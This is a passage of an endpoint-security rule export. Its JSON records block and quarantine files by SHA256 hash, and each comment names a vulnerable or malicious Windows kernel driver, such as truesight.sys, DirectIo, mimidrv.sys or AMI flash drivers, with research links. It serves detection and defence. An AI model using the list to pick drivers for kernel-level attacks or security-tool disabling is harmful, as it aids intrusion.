"416c5a1c88330554302199a9a5b85033d1c7cb8dab4a35ea02fedd81b75c4d99", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5cf177d4-6867-5729-a8f4-5e526a832526", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614666Z", + "creation_date": "2026-03-23T11:45:29.614668Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614673Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "85866e8c25d82c1ec91d7a8076c7d073cccf421cf57d9c83d80d63943a4edd94", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5cf30658-3cef-542a-aada-cf1ffd3a84f7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145464Z", + "creation_date": "2026-03-23T11:45:31.145466Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145474Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "93e078ab140c67bc765bbc63852f8a414780f42c895977be3711fafbc5a15756", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5cf76e46-a09b-5d7f-a24a-a28aaf77b000", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832479Z", + "creation_date": "2026-03-23T11:45:30.832481Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832486Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7148dd4601f683b6038c8aadce698a0c74be1f3940f25dcc44564952e3bd7777", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5d09221f-bdbf-5d62-bdb5-5cd28922a4e5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622985Z", + "creation_date": "2026-03-23T11:45:29.622990Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622995Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "40e624bf557b51775af1ca17062c4eca3693322e250b257aec7dc579e626ef07", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5d200e5b-516e-597a-a553-25f8d04aefdc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494780Z", + "creation_date": "2026-03-23T11:45:31.494782Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494791Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2efc60be1e2ca1389bc275c7946ca8a88105d5df61fd909508f2798d9cd841f4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5d219bb3-599d-5ac4-82ea-78e60c0e8c2f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827803Z", + "creation_date": "2026-03-23T11:45:30.827805Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827811Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bdc8c2ca2b138742d4b441e7b3cd3566421d40e45afc6b62a293472926dd912d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5d28294e-e7b7-5c0f-832c-efd6b207759c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833399Z", + "creation_date": "2026-03-23T11:45:30.833402Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833410Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "713b36a556eff48930301a0087a3bbefa4a1957aeefa560a5875ccab9c7cca45", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5d2bdf92-107c-5026-8822-ec0b1a6ee6af", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155429Z", + "creation_date": "2026-03-23T11:45:31.155432Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155440Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ba39b795cc2ecddccb80947c978e53fd660099e152c5828ff608bbae6407b0c8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5d2cdf74-57c7-578f-afff-6ad5c50ee4cd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140247Z", + "creation_date": "2026-03-23T11:45:31.140249Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140255Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c2859055855875731449de25b3a0eacda6cfd37520cbb41909db619108d1ab7a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5d3c7e3d-f301-5763-bcd4-ad341a6f8519", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146546Z", + "creation_date": "2026-03-23T11:45:32.146548Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146554Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7e82d60575309a6bf6145e7d509dac0b2e815a734a492055bf591c8a7ab55865", + "comment": "Malicious Kernel Driver (aka driver_ab811ca5.sys) [https://www.loldrivers.io/drivers/09d2e61d-e041-4ec8-ab7b-385848456a36/] [authentihash 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5d3d4a70-31c5-5aea-beab-5e4669bba483", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823481Z", + "creation_date": "2026-03-23T11:45:30.823485Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823491Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c22afc69a39092ca8f8efd1b1cad613606339df1c121fcf390f9fc4449c267a9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5d7748ef-25d4-5787-b0d6-fa4cd43dd5ad", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145836Z", + "creation_date": "2026-03-23T11:45:31.145839Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145856Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fb10b1366d191682fad1ad6d163c47c979c0db00e403c8e44952ab53273cab71", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5d7cc030-2d6a-57a2-9a82-177276ba14f4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144271Z", + "creation_date": "2026-03-23T11:45:31.144273Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144278Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5ba81b423320a4487ae7a8776e3005142514d1715afd7b563f586bf10e5e1f37", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5d877bb5-0662-5199-93ec-3e2c1153a265", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467559Z", + "creation_date": "2026-03-23T11:45:30.467563Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467573Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "77280614edf2e476a853c7881a4ff1402d67d4dd3e218af657f44fd4d4fbdbcb", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5d930509-d05d-5c28-b593-8b1dc0f9c3e9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826076Z", + "creation_date": "2026-03-23T11:45:30.826079Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826088Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ba80b3a12a609c0d6069dcea7e346aa8d6e622e32eecd0244b40a4dcd8329ce1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5d99795b-719a-5981-98b9-164522b65a99", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977036Z", + "creation_date": "2026-03-23T11:45:29.977038Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977043Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2ede9e515a00c6a703a51b5a6e2d10d8d620be35da56fb6fec9a4fb96e6f88c7", + "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5d9ce0f4-c7a4-59de-be1a-358b13c4b74b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.471836Z", + "creation_date": "2026-03-23T11:45:31.471839Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.471848Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4b64def5d8bd9d37af54b758e4d0c7cb28cad032745ef0fc8442815772c4adab", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5da3f0a6-12c3-5726-ad02-19dd5f9547cf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617079Z", + "creation_date": "2026-03-23T11:45:29.617081Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617086Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"709ab95302bb44c7a7dafaf342ca933422ea03ed7b492be204a319161feb350e", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5da9f4d6-cef9-5881-8adf-e4f551d7e37b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154414Z", + "creation_date": "2026-03-23T11:45:31.154416Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154421Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0ecb274c24a2271eef97d629bfbdda7e14845c8b420ee91116f54f6652b3e084", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5dbc19a5-5ea8-528d-8416-f618db8bd210", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491296Z", + "creation_date": "2026-03-23T11:45:31.491299Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491306Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "942cfb6f9d5a7ba3bd96c7e99d783a13636a3b6a47996c8c4cbb886e609fe521", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5dc3b517-496c-5bfc-92ad-98bf6ba4dbdc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816397Z", + "creation_date": "2026-03-23T11:45:31.816400Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816408Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7d5dc2c4a402c8b3feee738efa5b24b84b530c161fec2bd0ad5284566d6f5ffc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5dd132af-5e54-52cc-b43a-13f57eeb40be", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970931Z", + "creation_date": "2026-03-23T11:45:29.970934Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970950Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "04a68cb3a0c063bc66d5b144525500947dab43a0a7633a786ee0060079ba83b5", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5de2dcdc-44cf-51e8-b994-e245daaabc79", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146415Z", + "creation_date": "2026-03-23T11:45:32.146417Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146424Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "270bbba20190463a27ae41ec283922b25d397aab31c96cd4eaa47eadaac07b00", + "comment": "Malicious Kernel Driver (aka driver_0ffb4081.sys) [https://www.loldrivers.io/drivers/8081b0d0-e18e-474a-bdfa-8ff1956d90cb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5de85586-50e0-51f8-981f-2a5ebe6404f4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823640Z", + "creation_date": "2026-03-23T11:45:31.823642Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823647Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5140d2d1cdd4ff9ea90a1a9d4cffe0195a5c01ea9fbec47e1643216cab559c2b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5dfd70dc-b80a-573b-a7ba-586d1f31eb4d", + "test_maturity_current_count": 0, + 
